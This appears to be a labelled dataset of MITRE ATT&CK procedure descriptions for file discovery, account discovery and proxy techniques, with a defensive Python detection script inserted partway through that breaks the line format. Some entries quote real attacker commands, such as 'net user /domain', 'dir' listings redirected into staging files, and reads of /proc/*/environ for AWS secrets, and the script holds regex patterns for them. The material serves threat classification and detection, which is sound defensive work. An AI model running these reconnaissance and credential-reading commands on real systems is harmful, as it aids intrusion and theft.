{"text1":"Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.","labels":"['T1083']"}
|
|
{"text1":"MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.","labels":"['T1083']"}
|
|
{"text1":"MoonWind has a command to return a directory listing for a specified directory.","labels":"['T1083']"}
|
|
{"text1":"NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.","labels":"['T1083']"}
|
|
{"text1":"NETWIRE has the ability to search for files on the compromised host.","labels":"['T1083']"}
|
|
{"text1":"Nebulae can list files and directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"NotPetya searches for files ending with dozens of different file extensions prior to encryption.","labels":"['T1083']"}
|
|
{"text1":"ObliqueRAT has the ability to recursively enumerate files on an infected endpoint.","labels":"['T1083']"}
|
|
{"text1":"OceanSalt can extract drive information from the endpoint and search files on the system.","labels":"['T1083']"}
|
|
{"text1":"Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.","labels":"['T1083']"}
|
|
{"text1":"Okrum has used DriveLetterView to enumerate drive information.","labels":"['T1083']"}
|
|
{"text1":"Operation Wocao has gathered a recursive directory listing to find files and directories of interest.","labels":"['T1083']"}
|
|
{"text1":"Orz can gather victim drive information.","labels":"['T1083']"}
|
|
{"text1":"OutSteel can search for specific file extensions, including zipped files.","labels":"['T1083']"}
|
|
{"text1":"POORAIM can conduct file browsing.","labels":"['T1083']"}
|
|
{"text1":"POWRUNER may enumerate user directories on a victim.","labels":"['T1083']"}
|
|
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve lists of files.","labels":"['T1083']"}
|
|
{"text1":"Penquin can use the command code \"do_vslist\" to send file names, size, and status to C2.","labels":"['T1083']"}
|
|
{"text1":"Peppy can identify specific files for exfiltration.","labels":"['T1083']"}
|
|
{"text1":"PingPull can enumerate storage volumes and folder contents of a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Pisloader has commands to list drives on the victim machine and to list file information for a given directory.","labels":"['T1083']"}
|
|
{"text1":"PlugX has a module to enumerate drives and find files recursively.","labels":"['T1083']"}
|
|
{"text1":"PoetRAT has the ability to list files upon receiving the \"ls\" command from C2.","labels":"['T1083']"}
|
|
{"text1":"PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.","labels":"['T1083']"}
|
|
{"text1":"Psylo has commands to enumerate all storage devices and to find all files that start with a particular string.","labels":"['T1083']"}
|
|
{"text1":"Pteranodon identifies files matching certain file extensions and copies them to subdirectories it created.","labels":"['T1083']"}
|
|
{"text1":"Pupy can walk through directories and recursively search for strings in files.","labels":"['T1083']"}
|
|
{"text1":"QakBot can identify whether it has been run previously on a host by checking for a specified folder.","labels":"['T1083']"}
|
|
{"text1":"QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.","labels":"['T1083']"}
|
|
{"text1":"RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.","labels":"['T1083']"}
|
|
{"text1":"REvil has the ability to identify specific files and directories that are not to be encrypted.","labels":"['T1083']"}
|
|
{"text1":"ROKRAT has the ability to gather a list of files and directories on the infected system.","labels":"['T1083']"}
|
|
{"text1":"RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.","labels":"['T1083']"}
|
|
{"text1":"Ramsay can collect directory and file lists.","labels":"['T1083']"}
|
|
{"text1":"Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands.","labels":"['T1083']"}
|
|
{"text1":"Remexi searches for files on the system.","labels":"['T1083']"}
|
|
{"text1":"RemoteUtilities can enumerate files and directories on a target machine.","labels":"['T1083']"}
|
|
{"text1":"Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims.","labels":"['T1083']"}
|
|
{"text1":"Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files.","labels":"['T1083']"}
|
|
{"text1":"Rover automatically searches for files on local drives based on a predefined list of file extensions.","labels":"['T1083']"}
|
|
{"text1":"SDBbot has the ability to get directory listings or drive information on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"SHOTPUT has a command to obtain a directory listing.","labels":"['T1083']"}
|
|
{"text1":"SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.","labels":"['T1083']"}
|
|
{"text1":"SLOTHFULMEDIA can enumerate files and directories.","labels":"['T1083']"}
|
|
{"text1":"SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time.","labels":"['T1083']"}
|
|
{"text1":"SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in their names.","labels":"['T1083']"}
|
|
{"text1":"SUNSPOT enumerated the Orion software Visual Studio solution directory path.","labels":"['T1083']"}
|
|
{"text1":"Sandworm Team has enumerated files on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Seasalt has the capability to identify the drive type on a victim.","labels":"['T1083']"}
|
|
{"text1":"Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.","labels":"['T1083']"}
|
|
{"text1":"Shamoon attempts to access the \"ADMIN$\", \"C$\\Windows\", \"D$\\Windows\", and \"E$\\Windows\" shares on the victim with its current privileges.","labels":"['T1083']"}
|
|
{"text1":"ShimRat can list directories.","labels":"['T1083']"}
|
|
{"text1":"Sidewinder has used malware to collect information on files and directories.","labels":"['T1083']"}
|
|
{"text1":"Siloscape searches for the Kubernetes config file and other related files using a regular expression.","labels":"['T1083']"}
|
|
{"text1":"Skidmap has checked for the existence of specific files including \"\/usr\/sbin\/setenforce\" and \"\/etc\/selinux\/config\". It also has the ability to monitor the cryptocurrency miner file and process.","labels":"['T1083']"}
|
|
{"text1":"Sliver can enumerate files on a target system.","labels":"['T1083']"}
|
|
{"text1":"Smoke Loader recursively searches through directories for files.","labels":"['T1083']"}
|
|
{"text1":"SombRAT can execute \"enum\" to enumerate files in storage on a compromised system.","labels":"['T1083']"}
|
|
{"text1":"Sowbug identified and extracted all Word documents on a server by using a command containing *.doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.","labels":"['T1083']"}
|
|
{"text1":"StreamEx has the ability to enumerate drive types.","labels":"['T1083']"}
|
|
{"text1":"StrifeWater can enumerate files on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"StrongPity can parse the hard drive on a compromised host to identify specific file extensions.","labels":"['T1083']"}
|
|
{"text1":"Stuxnet uses a driver to scan for specific filesystem driver objects.","labels":"['T1083']"}
|
|
{"text1":"SynAck checks its directory location in an attempt to avoid launching in a sandbox.","labels":"['T1083', 'T1497.001']"}
|
|
{"text1":"SysUpdate can search files on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"TAINTEDSCRIBE can use \"DirectoryList\" to enumerate files in a specified directory.","labels":"['T1083']"}
|
|
{"text1":"TINYTYPHON searches through the drive containing the OS, then all drive letters C through Z, for documents matching certain extensions.","labels":"['T1083']"}
|
|
{"text1":"TSCookie has the ability to discover drive information on the infected host.","labels":"['T1083']"}
|
|
{"text1":"Taidoor can search for specific files.","labels":"['T1083']"}
|
|
{"text1":"TajMahal has the ability to index files from drives, user profiles, and removable drives.","labels":"['T1083']"}
|
|
{"text1":"TeamTNT has used a script that checks `\/proc\/*\/environ` for environment variables related to AWS.","labels":"['T1083']"}
|
|
{"text1":"The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size.","labels":"['T1083']"}
|
|
{"text1":"TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.","labels":"['T1083']"}
|
|
{"text1":"Tropic Trooper has monitored files' modified time.","labels":"['T1083']"}
|
|
{"text1":"Turian can search for specific files and list directories.","labels":"['T1083']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover files in specific locations on the hard disk, including the %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the \"lPH*.dll\" pattern.","labels":"['T1083']"}
|
|
{"text1":"UNC2452 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\".","labels":"['T1083']"}
|
|
{"text1":"USBferry can detect the victim's file or folder list.","labels":"['T1083']"}
|
|
{"text1":"Volgmer can list directories on a victim.","labels":"['T1083']"}
|
|
{"text1":"WannaCry searches for a variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive\/compression format, and key and certificate files.","labels":"['T1083']"}
|
|
{"text1":"WarzoneRAT can enumerate directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"WastedLocker can enumerate files and directories just prior to encryption.","labels":"['T1083']"}
|
|
{"text1":"WhisperGate can locate files based on hardcoded file extensions.","labels":"['T1083']"}
|
|
{"text1":"WinMM sets a WH_CBT Windows hook to search for and capture files on the victim.","labels":"['T1083']"}
|
|
{"text1":"WindTail has the ability to enumerate the user's home directory and the path to its own application bundle.","labels":"['T1083']"}
|
|
{"text1":"Windigo has used a script to check for the presence of files created by OpenSSH backdoors.","labels":"['T1083']"}
|
|
{"text1":"Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts.","labels":"['T1083']"}
|
|
{"text1":"Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution.","labels":"['T1083']"}
|
|
{"text1":"XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\".","labels":"['T1083']"}
|
|
{"text1":"XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.","labels":"['T1083']"}
|
|
{"text1":"Zebrocy searches for files that are 60 MB or smaller and have one of the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the \"echo %APPDATA%\" command to obtain the path of that directory. Zebrocy can obtain the current execution path as well as perform drive enumeration.","labels":"['T1083']"}
|
|
{"text1":"Zox can enumerate files on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"ZxShell has a command to open a file manager and explorer on the system.","labels":"['T1083']"}
|
|
{"text1":"admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: \"dir c:\\ >> %temp%\\download\" \"dir \"c:\\Documents and Settings\" >> %temp%\\download\" \"dir \"c:\\Program Files\\\" >> %temp%\\download\" \"dir d:\\ >> %temp%\\download\"","labels":"['T1083']"}
|
|
{"text1":"ccf32 can parse collected files to identify specific file extensions.","labels":"['T1083']"}
|
|
{"text1":"cmd can be used to find files and directories with native functionality such as \"dir\" commands.","labels":"['T1083']"}
|
|
{"text1":"down_new has the ability to list the directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"jRAT can browse file systems.","labels":"['T1083']"}
|
|
{"text1":"menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.","labels":"['T1083']"}
|
|
{"text1":"njRAT can browse file systems using a file manager module.","labels":"['T1083']"}
|
|
{"text1":"zwShell can browse the file system.","labels":"['T1083']"}
|
|
{"text1":"APT29 obtained a list of users and their roles from an Exchange server using \"Get-ManagementRoleAssignment\".","labels":"['T1087']"}
|
|
{"text1":"XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.","labels":"['T1087']"}
|
|
{"text1":"APT1 used the commands \"net localgroup\",\"net user\", and \"net group\" to find accounts on the system.","labels":"['T1087.001']"}
|
|
{"text1":"APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.","labels":"['T1087.001']"}
|
|
{"text1":"APT32 enumerated administrative users using the commands \"net localgroup administrators\".","labels":"['T1087.001']"}
|
|
{"text1":"Agent Tesla can collect account information from the victim\u2019s machine.","labels":"['T1087.001']"}
|
|
{"text1":"Bankshot gathers domain and account names\/information through process monitoring.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"Bazar can identify administrator accounts on an infected host.","labels":"['T1087.001']"}
|
|
{"text1":"BitPaymer can enumerate the sessions for each user logged onto the infected host.","labels":"['T1087.001']"}
|
|
{"text1":"Chimera has used \"net user\" for account discovery.","labels":"['T1087.001']"}
|
|
{"text1":"Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts.","labels":"['T1087.001']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net user` command to gather account information.","labels":"['T1087.001']"}
|
|
{"text1":"Elise executes \"net user\" after initial communication is made to the remote server.","labels":"['T1087.001']"}
|
|
{"text1":"Empire can acquire local and domain user account information.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"Epic gathers a list of all user accounts, privilege classes, and time of last logon.","labels":"['T1087.001']"}
|
|
{"text1":"HyperStack can enumerate all account names on a remote share.","labels":"['T1087.001']"}
|
|
{"text1":"InvisiMole has a command to list account information on the victim\u2019s machine.","labels":"['T1087.001']"}
|
|
{"text1":"Kazuar gathers information on local groups and members on the victim\u2019s machine.","labels":"['T1087.001']"}
|
|
{"text1":"Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" \/domain\" on specific permissions groups.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"Kwampirs collects a list of accounts with the command \"net users\".","labels":"['T1087.001']"}
|
|
{"text1":"MURKYTOP has the capability to retrieve information about users on remote hosts.","labels":"['T1087.001']"}
|
|
{"text1":"Milan has run `C:\\Windows\\system32\\cmd.exe \/c cmd \/c dir c:\\users\\ \/s 2>&1` to discover local accounts.","labels":"['T1087.001']"}
|
|
{"text1":"Mis-Type may create a file containing the results of the command \"cmd.exe \/c net user {Username}\".","labels":"['T1087.001']"}
|
|
{"text1":"OSInfo enumerates local and domain users.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"OilRig has run \"net user\", \"net user \/domain\", \"net group \u201cdomain admins\u201d \/domain\", and \"net group \u201cExchange Trusted Subsystem\u201d \/domain\" to get account listings on a victim.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"P.A.S. Webshell can display the \/etc\/passwd file on a compromised host.","labels":"['T1087.001']"}
|
|
{"text1":"POWERSTATS can retrieve usernames from compromised hosts.","labels":"['T1087.001']"}
|
|
{"text1":"PUNCHBUGGY can gather user names.","labels":"['T1087.001']"}
|
|
{"text1":"Pony has used the \"NetUserEnum\" function to enumerate local accounts.","labels":"['T1087.001']"}
|
|
{"text1":"Poseidon Group searches for administrator accounts on both the local victim machine and the network.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"PoshC2 can enumerate local and domain user account information.","labels":"['T1087.001', 'T1087.002']"}
|
|
{"text1":"RATANKBA uses the \"net user\" command.","labels":"['T1087.001']"}
|
|
{"text1":"Remsec can obtain a list of users.","labels":"['T1087.001']"}
|
|
{"text1":"S-Type has run the command `net user` on a victim.","labels":"['T1087.001']"}
|
|
{"text1":"SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host.","labels":"['T1087.001']"}
|
|
{"text1":"Stuxnet enumerates user accounts of the local host.","labels":"['T1087.001']"}
|
|
{"text1":"TrickBot collects the users of the system.","labels":"['T1087.001']"}
|
|
{"text1":"Turla has used \"net user\" to enumerate local accounts on the system.","labels":"['T1087.001']"}
|
|
{"text1":"AdFind can enumerate domain users.","labels":"['T1087.002']"}
|
|
{"text1":"Bazar has the ability to identify domain administrator accounts.","labels":"['T1087.002']"}
|
|
{"text1":"BloodHound can collect information about domain users, including identification of domain admin accounts.","labels":"['T1087.002']"}
|
|
{"text1":"BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.","labels":"['T1087.002']"}
|
|
{"text1":"CrackMapExec can enumerate the domain user accounts on a targeted system.","labels":"['T1087.002']"}
|
|
{"text1":"Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller.","labels":"['T1087.002']"}
|
|
{"text1":"Dragonfly has used batch scripts to enumerate users on a victim domain controller.","labels":"['T1087.002']"}
|
|
{"text1":"During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.","labels":"['T1087.002']"}
|
|
{"text1":"LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network.","labels":"['T1087.002']"}
|
|
{"text1":"Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.","labels":"['T1087.002']"}
|
|
{"text1":"MuddyWater has used \"cmd.exe net user \/domain\" to enumerate domain users.","labels":"['T1087.002']"}
|
|
{"text1":"Net commands used with the \"\/domain\" flag can be used to gather information about and manipulate user accounts on the current domain.","labels":"['T1087.002']"}
|
|
{"text1":"Operation Wocao has used the \"net\" command to retrieve information about domain accounts.","labels":"['T1087.002']"}
|
|
{"text1":"POWRUNER may collect user account information by running \"net user \/domain\" or a series of other commands on a victim.","labels":"['T1087.002']"}
|
|
{"text1":"SILENTTRINITY can use `System.Security.AccessControl` namespaces to retrieve domain user information.","labels":"['T1087.002']"}
|
|
{"text1":"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.","labels":"['T1087.002']"}
|
|
{"text1":"SoreFang can enumerate domain accounts via \"net.exe user \/domain\".","labels":"['T1087.002']"}
|
|
{"text1":"Stuxnet enumerates user accounts of the domain.","labels":"['T1087.002']"}
|
|
{"text1":"The IceApple Active Directory Querier module can perform authenticated requests against an Active Directory server.","labels":"['T1087.002']"}
|
|
{"text1":"Turla has used \"net user \/domain\" to enumerate domain accounts.","labels":"['T1087.002']"}
|
|
{"text1":"Valak has the ability to enumerate domain admin accounts.","labels":"['T1087.002']"}
|
|
{"text1":"dsquery can be used to gather information on user accounts within a domain.","labels":"['T1087.002']"}
|
|
{"text1":"menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.","labels":"['T1087.002']"}
|
|
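The entries above for T1083 (directory listings such as admin@338's `dir c:\ >> %temp%\download`) and T1087.001/.002 (`net user`, `net localgroup administrators`, `net user /domain`, `net group "domain admins" /domain`, dsquery, csvde, AdFind) describe the same command lines a defender can triage from process-creation telemetry. The following is an added example written for this page, not code from MITRE ATT&CK or from any tool named above. It assumes Sysmon-style process-creation fields (host, user, image, command line; the field names are an assumption) and runs over constructed sample events embedded in the block. The point it makes beyond the individual entries is that a single `net user` is routine, while several distinct discovery techniques from one host and user in one session is what merits an alert.

```python
"""Discovery command-line triage: maps process-creation events to T1083 / T1087.x.

Added example; the events below are constructed, not real telemetry."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names assumed; modelled on Sysmon EID 1)."""
    host: str
    user: str
    image: str      # image file name only, e.g. "net.exe"
    cmdline: str


# Constructed sample events (not real telemetry). WS01/jdoe chains the
# admin@338-style "dir ... >> %temp%\download" with local account listing.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "jdoe", "cmd.exe", r'cmd.exe /c dir c:\ >> %temp%\download'),
    ProcEvent("WS01", "jdoe", "cmd.exe", r'cmd.exe /c dir "c:\Documents and Settings" >> %temp%\download'),
    ProcEvent("WS01", "jdoe", "net.exe", "net user"),
    ProcEvent("WS01", "jdoe", "net.exe", "net localgroup administrators"),
    ProcEvent("WS02", "svc_backup", "net.exe", 'net group "domain admins" /domain'),
    ProcEvent("WS02", "svc_backup", "net1.exe", "net1 user /domain"),
    ProcEvent("WS03", "itadmin", "dsquery.exe", "dsquery user -limit 0"),
    ProcEvent("WS04", "jsmith", "explorer.exe", "explorer.exe"),
]

# net.exe hands most verbs to net1.exe, so match both binaries.
NET_ACCOUNT_RE = re.compile(r'\bnet1?(?:\.exe)?\s+(users?|localgroup|group)\b')
# "dir <drive>:\ ... >> file": directory listings redirected into a staging file.
DIR_REDIRECT_RE = re.compile(r'\bdir\s+"?[a-z]:\\.*>>')
# Tools that query AD directly (the page lists dsquery, csvde.exe and AdFind).
AD_QUERY_TOOLS = {"dsquery.exe", "csvde.exe", "adfind.exe"}


def classify(ev: ProcEvent) -> set[str]:
    """Return the ATT&CK sub-technique IDs one event suggests (may be empty)."""
    cmd = ev.cmdline.lower()
    techs: set[str] = set()
    m = NET_ACCOUNT_RE.search(cmd)
    if m:
        # A /domain flag, or "net group" (global groups), points at the domain.
        if "/domain" in cmd or m.group(1) == "group":
            techs.add("T1087.002")
        else:
            techs.add("T1087.001")
    if ev.image.lower() in AD_QUERY_TOOLS:
        techs.add("T1087.002")
    if DIR_REDIRECT_RE.search(cmd):
        techs.add("T1083")
    return techs


def summarize(events) -> dict[tuple[str, str], list[str]]:
    """Technique IDs seen per (host, user); single commands are noisy, chains are not."""
    hits: dict[tuple[str, str], set[str]] = defaultdict(set)
    for ev in events:
        hits[(ev.host, ev.user)] |= classify(ev)
    return {k: sorted(v) for k, v in hits.items() if v}


def alerts(events, min_techniques: int = 2) -> list[tuple[str, str]]:
    """(host, user) pairs that ran at least `min_techniques` distinct discovery techniques."""
    return sorted(k for k, v in summarize(events).items() if len(v) >= min_techniques)


if __name__ == "__main__":
    for key, techs in summarize(SAMPLE_EVENTS).items():
        print(key, techs)
    print("alerts:", alerts(SAMPLE_EVENTS))
```

The threshold of two techniques is a starting point, not a tuned value: help-desk and admin accounts legitimately run `net user` and `dsquery`, so a real deployment would add an allowlist of administrative hosts or users and a time window for the grouping.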
{"text1":"Backdoor.Oldrea collects address book information from Outlook.","labels":"['T1087.003']"}
|
|
{"text1":"BoomBox can execute an LDAP query to discover e-mail accounts for domain users.","labels":"['T1087.003']"}
|
|
{"text1":"Emotet has been observed leveraging a module that can scrape email addresses from Outlook.","labels":"['T1087.003']"}
|
|
{"text1":"Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.","labels":"['T1087.003']"}
|
|
{"text1":"Magic Hound has used Powershell to discover email accounts.","labels":"['T1087.003']"}
|
|
{"text1":"MailSniper can be used to obtain account names from Exchange and Office 365 using the \"Get-GlobalAddressList\" cmdlet.","labels":"['T1087.003']"}
|
|
{"text1":"Ruler can be used to enumerate Exchange users and dump the GAL.","labels":"['T1087.003']"}
|
|
{"text1":"TrickBot collects email addresses from Outlook.","labels":"['T1087.003']"}
|
|
{"text1":"AADInternals can enumerate Azure AD users.","labels":"['T1087.004']"}
|
|
{"text1":"APT41 used a tool called CLASSFON to covertly proxy network communications.","labels":"['T1090']"}
|
|
{"text1":"BADCALL functions as a proxy server between the victim and C2 server.","labels":"['T1090']"}
|
|
{"text1":"Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.","labels":"['T1090']"}
|
|
{"text1":"Earth Lusca adopted Cloudflare as a proxy for compromised servers.","labels":"['T1090']"}
|
|
{"text1":"FLIPSIDE is a simple proxy that creates an outbound RDP connection.","labels":"['T1090']"}
|
|
{"text1":"For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.","labels":"['T1090']"}
|
|
{"text1":"Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.","labels":"['T1090']"}
|
|
{"text1":"Gazer identifies a proxy server if it exists and uses it to make HTTP requests.","labels":"['T1090']"}
|
|
{"text1":"HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.","labels":"['T1090']"}
|
|
{"text1":"HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.","labels":"['T1090']"}
|
|
{"text1":"KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.","labels":"['T1090']"}
|
|
{"text1":"LAPSUS$ has leveraged NordVPN for its egress points when targeting intended victims.","labels":"['T1090']"}
|
|
{"text1":"NETWIRE can implement use of proxies to pivot traffic.","labels":"['T1090']"}
|
|
{"text1":"Ngrok can be used to proxy connections to machines located behind NAT or firewalls.","labels":"['T1090']"}
|
|
{"text1":"POLONIUM has used the AirVPN service for operational activity.","labels":"['T1090']"}
|
|
{"text1":"PoshC2 contains modules that allow for use of proxies in command and control.","labels":"['T1090']"}
|
|
{"text1":"QuasarRAT can communicate over a reverse proxy using SOCKS5.","labels":"['T1090']"}
|
|
{"text1":"Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.","labels":"['T1090']"}
|
|
{"text1":"SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.","labels":"['T1090']"}
|
|
{"text1":"SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.","labels":"['T1090']"}
|
|
{"text1":"Ursnif has used a peer-to-peer (P2P) network for C2.","labels":"['T1090']"}
|
|
{"text1":"Vasport is capable of tunneling through a proxy.","labels":"['T1090']"}
|
|
{"text1":"WarzoneRAT has the capability to act as a reverse proxy.","labels":"['T1090']"}
|
|
{"text1":"Windigo has delivered a generic Windows proxy Win32\/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.","labels":"['T1090']"}
|
|
{"text1":"Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.","labels":"['T1090']"}
|
|
{"text1":"ZxShell can set up an HTTP or SOCKS proxy.","labels":"['T1090']"}
|
|
{"text1":"netsh can be used to set up a proxy tunnel to allow remote host access to an infected host.","labels":"['T1090']"}
|
|
{"text1":"APT39 used custom tools to create SOCKS5 and custom protocol proxies between infected hosts.","labels":"['T1090.001']"}
|
|
{"text1":"CHOPSTICK used a proxy server between victims and the C2 server.","labels":"['T1090.001']"}
|
|
{"text1":"Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.","labels":"['T1090.001']"}
|
|
{"text1":"Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.","labels":"['T1090.001']"}
|
|
{"text1":"FatDuke can use pipes to connect machines with restricted internet access to remote machines via other infected hosts.","labels":"['T1090.001']"}
|
|
{"text1":"Higaisa discovered system proxy settings and used them if available.","labels":"['T1090.001']"}
|
|
{"text1":"Hikit supports peer connections.","labels":"['T1090.001']"}
|
|
{"text1":"Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.","labels":"['T1090.001']"}
|
|
{"text1":"MiniDuke can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.","labels":"['T1090.001']"}
|
|
{"text1":"Mythic can leverage a peer-to-peer C2 profile between agents.","labels":"['T1090.001']"}
|
|
{"text1":"Operation Wocao can proxy traffic through multiple infected systems.","labels":"['T1090.001']"}
|
|
{"text1":"Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.","labels":"['T1090.001']"}
|
|
{"text1":"Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.","labels":"['T1090.001']"}
|
|
{"text1":"The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server.","labels":"['T1090.001']"}
|
|
{"text1":"The Winnti for Windows HTTP\/S C2 mode can make use of a local proxy.","labels":"['T1090.001']"}
|
|
{"text1":"Turla has compromised internal network systems to act as a proxy to forward traffic to C2.","labels":"['T1090.001']"}
|
|
{"text1":"UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.","labels":"['T1090.001']"}
|
|
{"text1":"APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.","labels":"['T1090.002']"}
|
|
{"text1":"An APT3 downloader establishes SOCKS5 connections for its initial C2.","labels":"['T1090.002', 'T1095']"}
|
|
{"text1":"FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel.","labels":"['T1090.002']"}
|
|
{"text1":"GALLIUM used a modified version of HTRAN to redirect connections between networks.","labels":"['T1090.002']"}
|
|
{"text1":"Lazarus Group has used multiple proxies to obfuscate network traffic from victims.","labels":"['T1090.002']"}
|
|
{"text1":"MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).","labels":"['T1090.002']"}
|
|
{"text1":"Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.","labels":"['T1090.002']"}
|
|
{"text1":"Okrum can identify proxy servers configured and used by the victim, and use them to make HTTP requests to its C2 server.","labels":"['T1090.002']"}
|
|
{"text1":"POWERSTATS has connected to C2 servers through proxies.","labels":"['T1090.002']"}
|
|
{"text1":"QakBot has a module that can proxy C2 communications.","labels":"['T1090.002']"}
|
|
{"text1":"Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via SOCKS4 or SOCKS5.","labels":"['T1090.002']"}
|
|
{"text1":"The Winnti for Windows HTTP\/S C2 mode can make use of an external proxy.","labels":"['T1090.002']"}
|
|
{"text1":"Tonto Team has routed their traffic through an external server in order to obfuscate their location.","labels":"['T1090.002']"}
|
|
{"text1":"TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.","labels":"['T1090.002']"}
|
|
{"text1":"menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.","labels":"['T1090.002']"}
|
|
{"text1":"A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (NetBIOS), and 445 (SMB), enabling full remote access from outside the network; APT29 has also used Tor more generally.","labels":"['T1090.003']"}
|
|
